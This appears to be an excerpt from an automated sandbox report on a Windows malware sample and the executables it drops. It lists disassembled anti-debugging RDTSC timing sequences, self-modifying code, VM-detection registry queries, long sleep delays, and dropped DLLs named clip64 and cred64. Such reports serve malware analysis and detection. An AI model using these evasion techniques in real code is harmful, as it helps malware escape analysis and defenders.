                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51F0BF4 second address: 51F0C8F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC734E5F77Dh 0x00000008 add ecx, 21777E36h 0x0000000e jmp 00007FC734E5F781h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push dword ptr [ebp+0Ch] 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FC734E5F77Ch 0x00000021 or cx, 5D58h 0x00000026 jmp 00007FC734E5F77Bh 0x0000002b popfd 0x0000002c call 00007FC734E5F788h 0x00000031 push esi 0x00000032 pop edx 0x00000033 pop esi 0x00000034 popad 0x00000035 push dword ptr [ebp+08h] 0x00000038 jmp 00007FC734E5F77Dh 0x0000003d push 01C0D903h 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FC734E5F789h 0x0000004b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51F0C8F second address: 51F0C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51F0C93 second address: 51F0C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51F0C99 second address: 51F0CC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ah 0x00000005 call 00007FC73488207Fh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [esp], 01C1D901h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov di, cx 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51F0D73 second address: 51F0D82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51F0D82 second address: 51F0D9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734882084h 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8D62D6 second address: 8D62DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8D62DE second address: 8D62E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8D62E3 second address: 8D62E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8D62E9 second address: 8D62ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E484F second address: 8E4855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E4855 second address: 8E485D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E4B36 second address: 8E4B4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E4B4B second address: 8E4B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E4B51 second address: 8E4B7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007FC734E5F776h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007FC734E5F781h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC734E5F77Dh 0x00000019 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E4CB5 second address: 8E4CBB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E4CBB second address: 8E4CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E4CC1 second address: 8E4CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E4CC8 second address: 8E4CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC734E5F781h 0x0000000f jnc 00007FC734E5F776h 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E4CE9 second address: 8E4CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E4CED second address: 8E4CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E4E39 second address: 8E4E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734882085h 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E4E52 second address: 8E4E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E4E56 second address: 8E4E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jp 00007FC734882076h 0x0000000f pop ebx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E7781 second address: 8E77B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a add dword ptr [ebp+124490C3h], edx 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D1CBDh], ebx 0x00000018 push 2C73CFFEh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC734E5F785h 0x00000024 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E77B5 second address: 8E782D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882084h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 2C73CF7Eh 0x00000010 mov edi, eax 0x00000012 push 00000003h 0x00000014 adc ecx, 7FD27F96h 0x0000001a push 00000000h 0x0000001c jl 00007FC73488207Ch 0x00000022 sub dword ptr [ebp+122D1C81h], esi 0x00000028 push 00000003h 0x0000002a mov edi, dword ptr [ebp+122D3AB2h] 0x00000030 call 00007FC734882079h 0x00000035 jg 00007FC734882088h 0x0000003b jmp 00007FC734882082h 0x00000040 push eax 0x00000041 push ecx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FC734882084h 0x00000049 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E782D second address: 8E7842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jbe 00007FC734E5F776h 0x00000014 pop esi 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E7842 second address: 8E787E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007FC734882076h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jp 00007FC73488208Ch 0x00000014 jmp 00007FC734882086h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jp 00007FC73488207Ch 0x00000025 jng 00007FC734882076h 0x0000002b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E796C second address: 8E7970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E7970 second address: 8E7A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FC734882076h 0x0000000d jns 00007FC734882076h 0x00000013 popad 0x00000014 popad 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 jnc 00007FC734882080h 0x0000001f pop eax 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007FC734882078h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a push 00000003h 0x0000003c mov dword ptr [ebp+122D2C80h], esi 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push ecx 0x00000047 call 00007FC734882078h 0x0000004c pop ecx 0x0000004d mov dword ptr [esp+04h], ecx 0x00000051 add dword ptr [esp+04h], 0000001Bh 0x00000059 inc ecx 0x0000005a push ecx 0x0000005b ret 0x0000005c pop ecx 0x0000005d ret 0x0000005e mov ecx, dword ptr [ebp+122D3BE2h] 0x00000064 push 00000003h 0x00000066 jns 00007FC734882082h 0x0000006c call 00007FC734882079h 0x00000071 jmp 00007FC734882080h 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007FC73488207Eh 0x00000080 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E7A2D second address: 8E7A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E7A31 second address: 8E7A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E7A37 second address: 8E7A69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F785h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jp 00007FC734E5F77Eh 0x00000013 jnc 00007FC734E5F778h 0x00000019 mov eax, dword ptr [eax] 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E7A69 second address: 8E7A7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jg 00007FC734882076h 0x00000014 pop edi 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E7A7E second address: 8E7B0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC734E5F788h 0x00000008 jmp 00007FC734E5F781h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FC734E5F778h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b lea ebx, dword ptr [ebp+1244C644h] 0x00000031 jmp 00007FC734E5F789h 0x00000036 xchg eax, ebx 0x00000037 pushad 0x00000038 jmp 00007FC734E5F77Dh 0x0000003d jmp 00007FC734E5F77Dh 0x00000042 popad 0x00000043 push eax 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8E7BD8 second address: 8E7BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8D7DAD second address: 8D7DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC734E5F776h 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8D7DB7 second address: 8D7DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8D7DBB second address: 8D7DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FC734E5F776h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007FC734E5F776h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 9065C5 second address: 9065D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 9065D0 second address: 9065D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 90689D second address: 9068A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 906F69 second address: 906F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F77Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 906F7F second address: 906F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 906F85 second address: 906F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 9070F1 second address: 9070FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 9070FC second address: 907101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 90728D second address: 907298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Tries to evade debugger and weak emulator (self modifying code)
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSpecial instruction interceptor: First address: BEEE00 instructions caused by: Self-modifying code
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSpecial instruction interceptor: First address: D8AB49 instructions caused by: Self-modifying code
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSpecial instruction interceptor: First address: D8A8F3 instructions caused by: Self-modifying code
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSpecial instruction interceptor: First address: D95345 instructions caused by: Self-modifying code
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSpecial instruction interceptor: First address: E16CC0 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSpecial instruction interceptor: First address: 76EE00 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSpecial instruction interceptor: First address: 90AB49 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSpecial instruction interceptor: First address: 90A8F3 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSpecial instruction interceptor: First address: 915345 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSpecial instruction interceptor: First address: 996CC0 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSpecial instruction interceptor: First address: 3CBE93 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSpecial instruction interceptor: First address: 5746A6 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSpecial instruction interceptor: First address: 572E9B instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSpecial instruction interceptor: First address: 3C94BA instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSpecial instruction interceptor: First address: 59D955 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSpecial instruction interceptor: First address: 57ED5D instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSpecial instruction interceptor: First address: 5FBBC6 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSpecial instruction interceptor: First address: DBE93 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSpecial instruction interceptor: First address: 2846A6 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSpecial instruction interceptor: First address: 282E9B instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSpecial instruction interceptor: First address: D94BA instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSpecial instruction interceptor: First address: 2AD955 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSpecial instruction interceptor: First address: 28ED5D instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSpecial instruction interceptor: First address: 30BBC6 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSpecial instruction interceptor: First address: DB4648 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSpecial instruction interceptor: First address: BF5AF5 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSpecial instruction interceptor: First address: E08FAD instructions caused by: Self-modifying code
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: BA4648 instructions caused by: Self-modifying code
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: 9E5AF5 instructions caused by: Self-modifying code
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: BF8FAD instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 684648 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 4C5AF5 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 6D8FAD instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeMemory allocated: 2610000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeMemory allocated: 2680000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeMemory allocated: 4680000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeMemory allocated: 1830000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeMemory allocated: 32A0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeMemory allocated: 52A0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_051F0CAD rdtsc 0_2_051F0CAD
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeThread delayed: delay time: 180000Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeThread delayed: delay time: 180000
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow / User API: threadDelayed 1033Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow / User API: threadDelayed 968Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow / User API: threadDelayed 1066Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow / User API: threadDelayed 1151Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow / User API: threadDelayed 1033Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow / User API: threadDelayed 1081Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow / User API: threadDelayed 1070Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow / User API: threadDelayed 895Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4066Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5741Jump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 9379
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeWindow / User API: threadDelayed 1149
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeWindow / User API: threadDelayed 821
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeWindow / User API: threadDelayed 1231
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeWindow / User API: threadDelayed 450
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeWindow / User API: threadDelayed 1415
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow / User API: threadDelayed 8437
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWindow / User API: threadDelayed 9310
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWindow / User API: threadDelayed 9274
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_2-11097
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dllJump to dropped file
